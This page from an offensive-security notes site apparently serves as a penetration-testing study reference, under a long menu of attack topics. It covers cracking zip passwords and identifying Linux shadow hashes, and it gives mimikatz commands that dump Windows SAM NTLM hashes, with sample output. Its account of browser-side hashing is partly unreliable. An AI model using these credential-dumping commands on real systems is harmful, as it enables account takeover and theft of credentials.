Particle42
  • 🔬Network Enumeration
    • NMAP
    • TCPdump
  • 🔭Website Enumeration
    • Passive Information Gathering
    • Subdomain Enumeration
  • 🖥️Web Application
    • URL & App Scan
    • Subdomain/Vhost Fuzz
    • Login Hack
    • Cross Site Scripting
    • Directory Traversal
    • Local File Inclusion
    • Remote File Inclusion
    • PHP Wrappers
    • SQL Injection
      • Bypass Authentication
      • Database Enumeration
      • Code Execution Via Injection
      • SQL Injection Tools
      • Other Resources
    • NOSQL Injection
      • Bypass Authentication
    • WordPress Scanner
    • Hints & Easter Eggs
  • 🎣Phishing
    • Client Info Gathering
    • HTA
    • Word Macros
    • Windows Library Files
  • 🪟Windows
    • Enumeration & PE Quick Ref
    • Enumeration
      • Users
      • Powershell History
      • System Details
      • Applications & Services
      • Files & Filesystems
      • Cached Creds
    • Windows PE
      • Windows PE Checklist
      • Service Binary Hijacking
      • Important Files
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Other PE Methods
      • Finding PE Vulns
      • SeImpersonatePrivilege
      • Bypassuac using Bypassuac.exe
      • Bypassuac using eventviewer.exe
      • Rasta Watson
    • Windows Remote Access
  • 📂Active Directory
    • About
    • Important Definitions
    • Exploitation Methodology
    • AD Kerberos
      • Invoke-Kerberoast - Shortcut
    • Domain Recon
      • Auto Recon
    • AD Authentication Attacks
      • Password Guessing
      • Creating & Cracking TGS
      • Kerberoasting
    • Lateral Movement
      • Pass the Hash
      • Overpass the Hash
      • Pass the Ticket
      • Distributed Component Object Model
      • Golden Ticket
      • Shadow Copy
      • Domain Controller Sync
      • Windows Management Instrumentation
      • PowerShell Remoting
    • All Commands, Tools & Scripts
      • Using Crackmapexec
      • Using Powerview
      • Important Scripts & Links
  • 🍺Buffer Over Flow
    • Finding EIP Position
    • Eliminating Bad Characters
    • Finding Return Address
    • Payload for BOF
  • 🐧Linux
    • Enumeration
      • Users
      • Encrypted Files
      • System Info
      • Files & Filesystems
      • Applications & Services
    • Attack Vectors
      • Authorised Keys
    • Linux PE
      • Enumeration Commands
      • Finding PE Vulns
      • Check Sudo List
      • Add User to Passwd File
      • SUIDs
      • Tasks with Wildcard
      • Dirty Cow
      • DirtyPipe
      • Insecure File Permissions
      • Enumerating Processes
    • Quick Commands
  • Services
    • SMB
      • Find Server Version
      • Directory Traversal using Symlink
      • Enable Passwordless SMB Access
    • MSSQL
    • MYSQL
    • PHPLiteAdmin
    • SSH
      • Limited Keys Issue
    • SMTP
      • Sending Email
    • Webdav
    • DNS
      • DNS Recon
  • ↗️Pivoting
    • Bringing Internet Access
    • Port Forwarding
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
    • HTTP Tunnel-ing
    • DNS Tunneling
    • Chisel
    • Ligolo-NG
  • 🔑Passwords
    • Wordlist Generation
    • HTTP Applications
    • OS Login
    • Password Cracking
      • Using Hashes Directly
      • Cracking Hashes
    • SAM & System
  • 🛠️Practical Tools
    • Remote Shell
      • Alternate Reverse Shells
      • Move to Interactive Shell
    • File Transfers
      • Quick Webservers
    • CURL
    • Payloads
      • MSFVenom
      • Veil Framework
    • Crafty Executable
    • Metasploit
      • Discovery
    • IMPACKET
      • MSSQL-Client
    • Clever Alternatives
  • 🚀Privilege Escalation
    • General Info
  • ⚡Resources
    • Exploits
Powered by GitBook
On this page
  • Cracking Zipped Files
  • Password Hashes
  • Linux
  • Windows

Was this helpful?

  1. Passwords

Password Cracking

Cracking Zipped Files

fcrackzip is a fast password cracker partly written in assembler. It is able to crack password protected zip files with brute force or dictionary based attacks, optionally testing with unzip its results. It can also crack cpmask’ed images.

Password Hashes

Hashes are one way mathematical functions that create a standard sized, depending on the algorith, unique output for any length of strings. These functions are incredibly useful for concealing the real passwords and having only the hashes pass through the communication medium. So instead of a user submitting the password through an encrypted channel to an application, the password is converted into a hash at the browser and then submitted to the application, which in turn compares with the hash in the database against the user. Hence at no point, except at the JS level, the password of the user is revealed.

Unfortunately there are different attacks to this scenaio - read the password at the JS level, use the hash instead of the password or crack the hash through trial & error method. We are going to exploit the last method here.

In order to crack a hash, we need to first identify the type of hash, since there are many algorithms & combination of methods that generate different hashes, and then compute hashes from a list of pre-defined password strings.

Where can I find the hashes?

Linux

The password has is either stored within the passwd or shadow file in the "etc" folder. A simple cat of the file can reveal the hash unless the files are read protected. Here's a sample,

cracker:$y$j9T$ZK0bEZsSNBGw1Yv/kWge61$fp9tNqPvlPPksXAfy0zVlSTo0gfUWrX7rOZrHvqHvD.:19278:0:99999:7:::

The hash section can be taken out of this line and fed into the hashid command to identify the type of hash algorithm used,

hashid '$6$T6lcJJcLaIi3KQ8k$SzDYMo2863hQQUz8o33O6.FzIx9QvjHz9Qrk/68PYKwNS3vHdcmWNeRhyegCv96QNYG5aAqUnK/zeP9cm2eqS/'

Windows

Its slightly more tricky in the Windows operating system with the hashes being stored locally and in an Active Directory, if ADs are used. We will use a tool called "mimikatz.exe" to retreive password hashes. This tool is not available by default and it has to be downloaded into the system.

This tool has to be launched from a command prompt with administrative rights.

mimikatz.exe
//once the tool executes, the following commands have to be used
privilege::debug
token::elevate
lsadump::sam

The last command should dump all the users along with their hashes as shown below,

User : victim
  Hash NTLM: 2892z26cdf84d9a70e2eb3y9f05c425e
PreviousOS LoginNextUsing Hashes Directly

Last updated 6 months ago

Was this helpful?

🔑